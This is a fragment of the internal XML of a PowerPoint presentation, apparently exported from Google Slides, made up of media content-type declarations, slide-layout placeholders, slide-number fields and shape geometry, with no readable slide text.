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media/image1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image17.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.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9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image14.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image20.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image21.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image22.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image24.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image25.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image26.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image27.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image28.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01F38EA5-CB90-4C59-BED9-03E60ABF600A}"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BC63984A-B1EB-4B47-B79A-C84E64BD77E0}"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491946BF-CA27-44E3-883A-5EA88283AA58}"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5BC1508C-BB06-4A84-95A1-C6D71BDD323E}"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B73E94D1-407E-48CE-B6A5-6F2FD442C372}"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4B6468C6-23F3-4C66-9555-463D44797EA9}"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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{AD45250C-466E-47F4-84F2-F68DCEC76464}"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7102432F-46BE-4E78-8CEA-C2F96CBC9F02}"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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{C80D38B6-1D60-452F-B770-69CBC624025E}"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70B0E197-961D-42DC-926F-0D7051A55FD3}"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9740D39E-6435-4FE7-B318-48AF158C6918}"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C7F2B768-15E4-4DC8-84BD-225BC00B99A7}"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5CE5DF67-72AB-4A5A-8524-4C68B1AB47A9}"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1225EF2A-75A6-476A-B844-AACA0A1C9B89}"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561CE644-5123-4CB0-BF36-405FBB745A14}"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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{527200EF-9AB9-47FA-A89F-4296A9FBFA5E}"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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{3EC5B3FB-CB7F-4EAF-9F1D-3B6F506438B8}"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5F3811F6-09EA-493E-80F0-7C93B104109A}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CC5DBEC-FF83-4C56-BF7D-F907EE9858EA}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ACE637BF-6875-4227-B714-6D424A52284E}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1C349954-0975-44F6-BD21-137AA5B7D0A4}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{56C646AC-0085-4A73-806E-8E12F414224F}"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67D19AD4-D7DA-47FA-B11F-D6C2F73F9917}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{66E0E7D1-4C00-48E0-AEFA-479E132469B4}"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A3C583FB-DCD9-44EC-A984-D07D04F314AC}"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F927DECC-9DF4-49E7-9998-3A33B61BA4A1}"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B69B6A6A-2835-437F-8008-7CF49AFF3C69}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{995EBEF3-70C8-4027-82D6-7B93FD35D69D}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{DC089CCF-5D1E-43DA-A950-5A0DE19A9A79}"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{847DD1A0-8DB5-4BED-B9B7-8D5C60FEAB69}"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7037892F-EE76-4C41-8C68-BF8DAE2CDC58}"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2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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{8166941C-EDDC-4F5B-B75B-0303742A95AC}"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3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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{CBB7898D-2012-4B61-A7E9-BB336DE0F5C1}"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3A298731-4E01-4945-87FC-E566197DF01D}"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3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3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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1EEADB25-60FD-4C34-B002-9FAB5ED361DF}"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{25941C31-D11D-471A-98E3-FFA8285CAD5B}"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{F6140045-80F1-495A-B2D3-8377B8BBB81A}"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3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3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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{CB7D4955-0DC6-40D7-A4BD-EC5AC9C3F682}"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4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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{AD54DF75-080B-40A3-9D23-BA3A4ACA66B0}"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4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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{80ADC8D7-8A29-4BF5-B693-7909D7F99FC9}"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5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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{878FC2D9-1B1A-41E4-9FB8-5EC5D55B1872}"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5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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{FF52DDFB-467C-4348-9FF2-9F8C984E2BDB}"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5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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4C6F46CA-B5FC-4416-A804-477F7F5EE30A}"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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{DF09E34E-7ABC-40C5-8008-E4EFC67463E1}"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6762DF58-A951-4B5B-BF92-D5B299CC0248}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2FF5329-3F79-4050-B0BB-C1E95B471599}"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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{319FDA9F-8E41-46D3-BC7B-6421FD8AF37F}"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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{69C7E04C-6BB5-418E-B040-D42AA06A31F7}"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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B0AFA131-4061-4079-9253-6306621DDECB}"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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{9B140A67-D281-43CB-A904-21260632C7A8}"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8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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2E97D833-85DC-43A2-86A8-809083F49DD8}"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8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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{EA593D50-6A2F-461E-9B8C-A88B16A626B9}"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9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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4862FEA2-E7E5-4369-AC1B-BF767D4CC004}"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9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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D09A2232-8590-4618-97A0-3D9BBBD7FCB2}"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9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0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0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0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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{45BDD211-6A0B-4523-81C3-88FA1410304A}"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F7E28D43-AC1D-44AD-A052-2307D823DA8A}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>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0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0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0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0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0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0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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{523352BA-108F-46DD-9AE7-ECBBF7FE589B}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>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1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1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2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2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2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2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2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3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3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C30F7FFA-BBA3-4C97-A968-2F7AF33ED7F6}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>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3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4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4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4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4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4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4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4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4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5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5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26FCE8FE-8A50-4C53-A57C-E1AD5C59B985}"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47EA7811-AD27-4495-9C66-C0F4969AEAE1}"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8;p2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="2488" r="0" b="2499"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="275040"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237240" y="2088360"/>
            <a:ext cx="8595000" cy="792000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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2" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{E31E0DCE-5329-4072-9637-6696AE3A0788}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>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41" name="Google Shape;15;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="640080"/>
            <a:ext cx="8595360" cy="972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
        <p:nvSpPr>
          <p:cNvPr id="42" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{14CC7A0B-D934-4037-8423-FDB5678E7C5E}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;17;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906440"/>
            <a:ext cx="8595360" cy="9720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="a9b7c0"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1284120"/>
            <a:ext cx="9143640" cy="3581280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="914400" anchor="t">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1" name="Google Shape;21;p4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="2488" r="0" b="2499"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="275040"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="2088360"/>
            <a:ext cx="8595000" cy="792000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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83" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556840" y="4749840"/>
            <a:ext cx="548280" cy="393120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{25F96152-231C-4FF4-AEA5-E050F498DEC0}" type="slidenum">
              <a:rPr b="0" lang="en" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{63A8671E-9685-4D57-9DDD-4B25278B0D93}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="PlaceHolder 4"/>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2" name="Google Shape;27;p5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="118" r="0" b="120"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048800" y="910440"/>
            <a:ext cx="1828440" cy="3784320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245960"/>
            <a:ext cx="6699240" cy="3897360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="914400" anchor="t">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124" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12600" y="0"/>
            <a:ext cx="6699240" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>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125" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{F6DB7D33-0615-4559-A46F-3A5359038834}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;33;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906440"/>
            <a:ext cx="8595360" cy="9720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="a9b7c0"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;34;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="640080"/>
            <a:ext cx="8595360" cy="972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4" name="Google Shape;37;p6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286160" y="649800"/>
            <a:ext cx="826920" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
